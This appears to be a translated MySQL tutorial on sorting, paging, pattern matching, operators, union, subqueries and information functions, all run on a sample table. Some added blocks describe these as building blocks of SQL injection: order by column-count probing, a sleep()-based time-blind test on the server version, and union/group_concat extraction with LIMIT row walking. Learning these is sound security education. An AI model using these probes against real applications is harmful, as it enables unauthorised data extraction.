1、Basic MySQL query statements
①Sorting: when the column name is known: select * from table order by column_name;
mysql> select*from bdd;
+----+--------------+
| xh | xm |
+----+--------------+
| 43 | Hello |
| 2 | bb |
| 3 | bb |
| 40 | Hello |
| 41 | Hello |
| 42 | bb |
| 44 | 0x48656c6c6f |
+----+--------------+
7 rows in set (0.00 sec)
mysql> select*from bdd order by xh;
+----+--------------+
| xh | xm |
+----+--------------+
| 2 | bb |
| 3 | bb |
| 40 | Hello |
| 41 | Hello |
| 42 | bb |
| 43 | Hello |
| 44 | 0x48656c6c6f |
+----+--------------+
7 rows in set (0.00 sec)
When the column names are unknown, a statement such as order by 1 can be used instead;
order by 1 sorts by the first column, order by 2 by the second column, and so on. A position larger than the number of columns in the result is an error (Unknown column 'N' in 'order clause'), which is why order by N is also the usual way to find out how many columns a query returns;
mysql> select*from bdd order by 1;
+----+--------------+
| xh | xm |
+----+--------------+
| 2 | bb |
| 3 | bb |
| 40 | Hello |
| 41 | Hello |
| 42 | bb |
| 43 | Hello |
| 44 | 0x48656c6c6f |
+----+--------------+
7 rows in set (0.00 sec)
mysql> select*from bdd order by 2;
+----+--------------+
| xh | xm |
+----+--------------+
| 44 | 0x48656c6c6f |
| 2 | bb |
| 3 | bb |
| 42 | bb |
| 43 | Hello |
| 40 | Hello |
| 41 | Hello |
+----+--------------+
7 rows in set (0.00 sec)
desc = descending order, asc = ascending order (the default when neither is given);
mysql> select*from bdd order by xh desc;
+----+--------------+
| xh | xm |
+----+--------------+
| 44 | 0x48656c6c6f |
| 43 | Hello |
| 42 | bb |
| 41 | Hello |
| 40 | Hello |
| 3 | bb |
| 2 | bb |
+----+--------------+
7 rows in set (0.00 sec)
mysql> select*from bdd order by xh asc;
+----+--------------+
| xh | xm |
+----+--------------+
| 2 | bb |
| 3 | bb |
| 40 | Hello |
| 41 | Hello |
| 42 | bb |
| 43 | Hello |
| 44 | 0x48656c6c6f |
+----+--------------+
7 rows in set (0.00 sec)
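The column-count probe described above, as an added example that is not part of the original page. It recreates the page's two-column bdd table with the same seven rows so it can be run on its own; the error text shown is MySQL's own message for an out-of-range ORDER BY position.

```sql
-- Added example (not from the original page): using ORDER BY <position>
-- to learn how many columns a query returns without knowing their names.
-- The table below is the same two-column bdd table used throughout the page.
CREATE TABLE bdd (xh INT, xm VARCHAR(20));
INSERT INTO bdd (xh, xm) VALUES
  (43,'Hello'),(2,'bb'),(3,'bb'),(40,'Hello'),(41,'Hello'),(42,'bb'),(44,'0x48656c6c6f');

-- Positions inside the column count sort normally:
SELECT * FROM bdd ORDER BY 1;          -- sorted by xh
SELECT * FROM bdd ORDER BY 2, 1 DESC;  -- by xm, ties broken by xh descending

-- One position past the last column fails, and the error text names the
-- offending position, which is what reveals the column count:
SELECT * FROM bdd ORDER BY 3;
-- ERROR 1054 (42S22): Unknown column '3' in 'order clause'

-- Only an integer literal is positional. A quoted string is just a constant,
-- so this is accepted but sorts nothing and reveals nothing:
SELECT * FROM bdd ORDER BY '3';

-- The same probe in the shape it takes when an application appends a
-- user-supplied sort position to its own query:
SELECT xh, xm FROM bdd WHERE xm='Hello' ORDER BY 2;   -- succeeds: at least 2 columns
SELECT xh, xm FROM bdd WHERE xm='Hello' ORDER BY 3;   -- ERROR 1054: exactly 2 columns
```

Stepping the position up until the first error gives the column count as the last position that succeeded; that count is what a later union query must match.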
②Pagination: select * from table limit n, m; [note: n is the offset, the number of rows to skip (the first row is 0), and m is the number of rows to return; limit m offset n is the equivalent long form]
mysql> select*from bdd;
+----+--------------+
| xh | xm |
+----+--------------+
| 43 | Hello |
| 2 | bb |
| 3 | bb |
| 40 | Hello |
| 41 | Hello |
| 42 | bb |
| 44 | 0x48656c6c6f |
+----+--------------+
7 rows in set (0.00 sec)
mysql> select * from bdd limit 0,1;
+----+-------+
| xh | xm |
+----+-------+
| 43 | Hello |
+----+-------+
1 row in set (0.00 sec)
mysql> select*from bdd limit 0,2;
+----+-------+
| xh | xm |
+----+-------+
| 43 | Hello |
| 2 | bb |
+----+-------+
2 rows in set (0.00 sec)
mysql> select*from bdd limit 1,2;
+----+------+
| xh | xm |
+----+------+
| 2 | bb |
| 3 | bb |
+----+------+
2 rows in set (0.00 sec)
mysql> select*from bdd limit 2,2;
+----+-------+
| xh | xm |
+----+-------+
| 3 | bb |
| 40 | Hello |
+----+-------+
2 rows in set (0.00 sec)
③Fuzzy matching: select * from table where username like 'pattern'; [note: like is pattern matching; a pattern with no wildcard in it matches the same rows as = in the example below, but the two operators are not identical, see the wildcard rules further down]
mysql> select * from bdd;
+----+--------------+
| xh | xm |
+----+--------------+
| 43 | Hello |
| 2 | bb |
| 3 | bb |
| 40 | Hello |
| 41 | Hello |
| 42 | bb |
| 44 | 0x48656c6c6f |
+----+--------------+
7 rows in set (0.00 sec)
mysql> select * from bdd where xm='bb';
+----+------+
| xh | xm |
+----+------+
| 2 | bb |
| 3 | bb |
| 42 | bb |
+----+------+
3 rows in set (0.00 sec)
mysql> select*from bdd where xm like 'bb';
+----+------+
| xh | xm |
+----+------+
| 2 | bb |
| 3 | bb |
| 42 | bb |
+----+------+
3 rows in set (0.00 sec)
To get every row whose xm contains the character b, put a % on each side of b, e.g. '%b%';
for rows that begin with b, put the % after it, e.g. 'b%';
for rows that end with b, put the % before it, e.g. '%b'.
% matches any sequence of characters (including none); _ matches exactly one character.
mysql> select*from bdd where xm like 'b';
Empty set (0.00 sec)
mysql> select * from bdd where xm like '%b%';
+----+------+
| xh | xm |
+----+------+
| 2 | bb |
| 3 | bb |
| 42 | bb |
+----+------+
3 rows in set (0.00 sec)
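The wildcard rules above, plus the cases where like and = actually disagree, as an added example that is not part of the original page. It assumes the bdd table (xh, xm) with the seven rows shown above and a PAD SPACE collation such as the latin1_swedish_ci default of the MySQL 5.5 server used on this page; under the NO PAD utf8mb4_0900_ai_ci default of MySQL 8.0 the trailing-space comparison returns 0 for both operators.

```sql
-- Added example (not from the original page): LIKE wildcards, escaping,
-- and where LIKE and = disagree. Assumes the bdd table (xh, xm) with the
-- seven rows shown above and a PAD SPACE collation (MySQL 5.5 default).
SELECT * FROM bdd WHERE xm LIKE 'H%';     -- starts with H: the three 'Hello' rows
SELECT * FROM bdd WHERE xm LIKE '%o';     -- ends with o: the three 'Hello' rows
SELECT * FROM bdd WHERE xm LIKE '_b';     -- _ matches exactly one character: the 'bb' rows
SELECT * FROM bdd WHERE xm LIKE 'b_';     -- also the 'bb' rows
SELECT * FROM bdd WHERE xm LIKE '0x%';    -- the row whose xm is the string '0x48656c6c6f'

-- % and _ are wildcards, so a literal percent sign must be escaped:
SELECT 'x%y' LIKE '%\%%' AS has_percent;              -- 1, backslash is the default escape
SELECT 'x%y' LIKE '%#%%' ESCAPE '#' AS has_percent;   -- 1, custom escape character

-- Where = and LIKE are not the same thing:
-- 1. Trailing spaces: = ignores them under a PAD SPACE collation, LIKE does not.
SELECT 'bb ' = 'bb' AS eq_result, 'bb ' LIKE 'bb' AS like_result;     -- 1, 0
-- 2. A pattern that contains a wildcard is not an exact match.
SELECT 'b%' = 'bb' AS eq_result, 'bb' LIKE 'b%' AS like_result;       -- 0, 1
-- 3. Both are case-insensitive under a _ci collation; BINARY forces an exact byte match.
SELECT 'hello' = 'Hello' AS eq_ci, BINARY 'hello' = 'Hello' AS eq_bin; -- 1, 0
```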
④Arithmetic operators: +, -, *, /, %; [note: the % operator here is the modulo (remainder) operator, not the like wildcard]
mysql> select 9+1;
+-----+
| 9+1 |
+-----+
| 10 |
+-----+
1 row in set (0.00 sec)
mysql> select 10-1;
+------+
| 10-1 |
+------+
| 9 |
+------+
1 row in set (0.00 sec)
mysql> select 2*2;
+-----+
| 2*2 |
+-----+
| 4 |
+-----+
1 row in set (0.02 sec)
mysql> select 8/2;
+--------+
| 8/2 |
+--------+
| 4.0000 |
+--------+
1 row in set (0.00 sec)
mysql> select 9%4;
+------+
| 9%4 |
+------+
| 1 |
+------+
1 row in set (0.00 sec)
⑤Logical operators:
AND | &&
OR | ||
NOT | !
(A single & or | is the bitwise operator, not the logical one; the logical forms are && and ||. || is logical OR only while the PIPES_AS_CONCAT sql_mode is off, which is the default.)
Programs branch on truth values, True and False; in MySQL these are represented by the integers 1 (true) and 0 (false), and a comparison such as xm='bb' yields one of them (or NULL when a side is NULL);
mysql> select * from bdd;
+----+--------------+
| xh | xm |
+----+--------------+
| 43 | Hello |
| 2 | bb |
| 3 | bb |
| 40 | Hello |
| 41 | Hello |
| 42 | bb |
| 44 | 0x48656c6c6f |
+----+--------------+
7 rows in set (0.00 sec)
mysql> select * from bdd where xm='bb';
+----+------+
| xh | xm |
+----+------+
| 2 | bb |
| 3 | bb |
| 42 | bb |
+----+------+
3 rows in set (0.00 sec)
mysql> select * from bdd where xm ='bb' and xh=42;
+----+------+
| xh | xm |
+----+------+
| 42 | bb |
+----+------+
1 row in set (0.00 sec)
mysql> select * from bdd where xm='bb' && xh=42;
+----+------+
| xh | xm |
+----+------+
| 42 | bb |
+----+------+
1 row in set (0.00 sec)
mysql> select * from bdd where xm='bb' or xh=43;
+----+-------+
| xh | xm |
+----+-------+
| 43 | Hello |
| 2 | bb |
| 3 | bb |
| 42 | bb |
+----+-------+
4 rows in set (0.00 sec)
mysql> select * from bdd where xm='bb' || xh=43;
+----+-------+
| xh | xm |
+----+-------+
| 43 | Hello |
| 2 | bb |
| 3 | bb |
| 42 | bb |
+----+-------+
4 rows in set (0.00 sec)
mysql> select * from bdd where not xm='bb';
+----+--------------+
| xh | xm |
+----+--------------+
| 43 | Hello |
| 40 | Hello |
| 41 | Hello |
| 44 | 0x48656c6c6f |
+----+--------------+
4 rows in set (0.00 sec)
mysql> select * from bdd where xm!='bb';
+----+--------------+
| xh | xm |
+----+--------------+
| 43 | Hello |
| 40 | Hello |
| 41 | Hello |
| 44 | 0x48656c6c6f |
+----+--------------+
4 rows in set (0.00 sec)
⑥Delay: sleep(seconds). AND / OR evaluate selectively (short-circuit):
in an AND, if the left condition is false the right side is not evaluated; in an OR, if the left condition is true the right side is not evaluated. The timings below show this.
mysql> select sleep(5);
+----------+
| sleep(5) |
+----------+
| 0 |
+----------+
mysql> select * from bdd where xm ='bb';
+----+------+
| xh | xm |
+----+------+
| 2 | bb |
| 3 | bb |
| 42 | bb |
+----+------+
3 rows in set (0.00 sec)
mysql> select * from bdd where xm ='bb' and sleep(2);
Empty set (6.04 sec) // about 6 seconds: three rows have xm='bb', and for each of them the AND goes on to evaluate sleep(2). sleep() returns 0, i.e. false, so no row is returned. //
mysql> select * from bdd where xm ='bb' or sleep(1);
+----+------+
| xh | xm |
+----+------+
| 2 | bb |
| 3 | bb |
| 42 | bb |
+----+------+
3 rows in set (4.06 sec)
// Here the three rows with xm='bb' already satisfy the OR, so sleep(1) is skipped for them; for the other four rows the left condition is false, so sleep(1) is evaluated once per row, about 4 seconds in total. sleep(1) returns 0, i.e. false, so those four rows are not returned, and the result is the same three 'bb' rows as without the OR. //
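The truth-value rules from ⑤ and the short-circuit timing from ⑥, carried one step further to the point where a delay answers a yes/no question, as an added example that is not part of the original page. It assumes the bdd table (xh, xm) with the seven rows shown above and a server with the default sql_mode (so || is logical OR); the timings are approximate.

```sql
-- Added example (not from the original page): truth values, logical vs
-- bitwise operators, and how AND/OR short-circuiting turns sleep() into a
-- measurable yes/no answer. Assumes the bdd table (xh, xm) shown above.

-- Comparisons yield 1 (true), 0 (false) or NULL (unknown):
SELECT 1=1, 1=2, NULL=NULL, 1=1 AND NULL, 1=1 OR NULL;   -- 1, 0, NULL, NULL, 1

-- && and || are logical; single & and | are bitwise and give different answers:
SELECT 4 && 3, 4 & 3, 4 || 3, 4 | 3;   -- 1, 0, 1, 7

-- AND: the right side runs only for rows where the left side is true.
SELECT * FROM bdd WHERE xh=42  AND sleep(2);   -- one row matches -> ~2 s, Empty set
SELECT * FROM bdd WHERE xh=999 AND sleep(2);   -- no row matches  -> ~0 s, Empty set

-- OR: the right side runs only for rows where the left side is false.
SELECT * FROM bdd WHERE xm='bb' OR sleep(1);   -- 4 non-'bb' rows -> ~4 s, 3 rows back
SELECT * FROM bdd WHERE 1=1     OR sleep(1);   -- never sleeps    -> ~0 s, 7 rows back

-- Turning a question into a delay: the sleep happens only when the condition
-- inside IF() is true, so the response time alone reveals the answer.
SELECT * FROM bdd WHERE xh=42 AND IF(SUBSTRING(version(),1,1)='5', sleep(3), 0);
-- server version 5.x: ~3 s, Empty set (sleep returns 0, so the AND is false)
-- any other major version: ~0 s, Empty set

-- To keep the matching row in the result either way, compare the IF() to 0:
SELECT * FROM bdd WHERE xh=42 AND IF(SUBSTRING(version(),1,1)='5', sleep(3), 0)=0;
-- version 5.x: ~3 s and the row xh=42 is returned; otherwise ~0 s, same row.
```

The last two statements are the shape of a time-based blind test: the result set is identical in both branches, and only the elapsed time carries the information. Measure a baseline without sleep() first, since network jitter on a slow host can be mistaken for a short delay.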
2、Union query: union joins the results of two SELECT statements into one result set;
the column names of a union are taken from the query before the union;
mysql> select * from bdd where xh=42;
+----+------+
| xh | xm |
+----+------+
| 42 | bb |
+----+------+
1 row in set (0.00 sec)
mysql> select * from bdd where xh=42 union select 1,2;
+----+------+
| xh | xm |
+----+------+
| 42 | bb |
| 1 | 2 |
+----+------+
2 rows in set (0.01 sec)
The two sides of a union must have the same number of columns;
mysql> select * from bdd where xh=42 union select 1,2,3;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
When a row from the query before the union is identical to a row from the query after it, union outputs it only once;
mysql> select * from bdd where xh=42 union select 42,'bb';
+----+------+
| xh | xm |
+----+------+
| 42 | bb |
+----+------+
1 row in set (0.00 sec)
To keep both copies, use union all;
mysql> select * from bdd where xh=42 union all select 42,'bb';
+----+------+
| xh | xm |
+----+------+
| 42 | bb |
| 42 | bb |
+----+------+
2 rows in set (0.00 sec)
3、Subquery: a subquery is a SELECT nested inside another SQL statement. When one query is used as a condition of another query, it is called a subquery.
Simple way to think of it: like parentheses in arithmetic, where 1+2*2=5 but (1+2)*2=6, the part in parentheses is evaluated first; the subquery is executed first and its result is then used as a condition of the outer query.
A subquery must be enclosed in its own pair of parentheses.
mysql> select * from bdd where xh=43;
+----+-------+
| xh | xm |
+----+-------+
| 43 | Hello |
+----+-------+
1 row in set (0.00 sec)
mysql> select * from bdd where xh=(select 43); // the part in parentheses is evaluated first //
+----+-------+
| xh | xm |
+----+-------+
| 43 | Hello |
+----+-------+
1 row in set (0.00 sec)
Examples to make this concrete:
select * from user where username = (select username from admin where id = 1);
// does the username of the admin row with id=1 also exist in the user table; = requires the subquery to return at most one row //
select * from user where username in (select username from admin);
// which user rows have a username that also appears in the admin table; in accepts a subquery that returns several rows //
4、Functions commonly used in penetration testing
①group_concat(col) returns the values of col from all rows in the group joined into one string, comma-separated by default; the result is silently truncated at group_concat_max_len bytes (1024 by default);
mysql> select * from bdd;
+----+--------------+
| xh | xm |
+----+--------------+
| 43 | Hello |
| 2 | bb |
| 3 | bb |
| 40 | Hello |
| 41 | Hello |
| 42 | bb |
| 44 | 0x48656c6c6f |
+----+--------------+
7 rows in set (0.00 sec)
mysql> select group_concat(xm) from bdd;
+-----------------------------------------+
| group_concat(xm) |
+-----------------------------------------+
| Hello,bb,bb,Hello,Hello,bb,0x48656c6c6f |
+-----------------------------------------+
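The union (2), subquery (3) and group_concat (4①) material above, combined with the limit paging from 1②, as one added example that is not part of the original page. It assumes the bdd table (xh, xm) with the seven rows shown above; the error messages are MySQL's own.

```sql
-- Added example (not from the original page): combining UNION, a subquery,
-- group_concat() and LIMIT to pull column values through a query whose own
-- WHERE clause matches nothing. Assumes the bdd table (xh, xm) shown above.

-- A false left-hand condition leaves only the UNION rows, and the column
-- names still come from the left-hand SELECT:
SELECT * FROM bdd WHERE xh=0 UNION SELECT 1, 2;
-- | xh | xm |
-- |  1 |  2 |

-- Any expression can sit in a UNION slot, including an aggregate over
-- another (or the same) table:
SELECT * FROM bdd WHERE xh=0 UNION SELECT 1, group_concat(xm) FROM bdd;
-- | 1 | Hello,bb,bb,Hello,Hello,bb,0x48656c6c6f |
SELECT * FROM bdd WHERE xh=0
  UNION SELECT count(*), group_concat(DISTINCT xm SEPARATOR '|') FROM bdd;
-- | 7 | Hello|bb|0x48656c6c6f |

-- group_concat() output is silently cut at group_concat_max_len bytes
-- (default 1024); check the limit before trusting a long result:
SELECT @@group_concat_max_len;

-- When the result would be truncated, walk the rows one at a time instead.
-- ORDER BY makes the walk deterministic; LIMIT n,1 selects the (n+1)th row.
SELECT * FROM bdd WHERE xh=0 UNION SELECT 1, (SELECT xm FROM bdd ORDER BY xh LIMIT 0,1);  -- bb
SELECT * FROM bdd WHERE xh=0 UNION SELECT 1, (SELECT xm FROM bdd ORDER BY xh LIMIT 1,1);  -- bb
SELECT * FROM bdd WHERE xh=0 UNION SELECT 1, (SELECT xm FROM bdd ORDER BY xh LIMIT 2,1);  -- Hello
SELECT * FROM bdd WHERE xh=0 UNION SELECT 1, (SELECT xm FROM bdd ORDER BY xh LIMIT 7,1);  -- NULL: past the last row

-- A scalar subquery used with = must return exactly one row; with several
-- matches it errors, and IN is the right operator:
SELECT * FROM bdd WHERE xh=(SELECT xh FROM bdd WHERE xm='bb');
-- ERROR 1242 (21000): Subquery returns more than 1 row
SELECT * FROM bdd WHERE xh IN (SELECT xh FROM bdd WHERE xm='bb');   -- rows 2, 3 and 42
```

The NULL at offset 7 is the stop condition for the walk: once a scalar subquery with LIMIT n,1 returns NULL, every row has been seen.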
② user() returns the user name and host the client connected as (user@host); current_user() returns the account the server actually authenticated against, which can differ when the matching grant uses a wildcard host;
mysql> select user();
+----------------+
| user() |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
③version() returns the MySQL server version string (the same value as @@version);
mysql> select version ();
+------------+
| version () |
+------------+
| 5.5.53 |
+------------+
1 row in set (0.00 sec)
5、select * from table; the * stands for every column of the table, in the order the table defines them
e.g. select * from bdd; is equivalent to select xh,xm from bdd;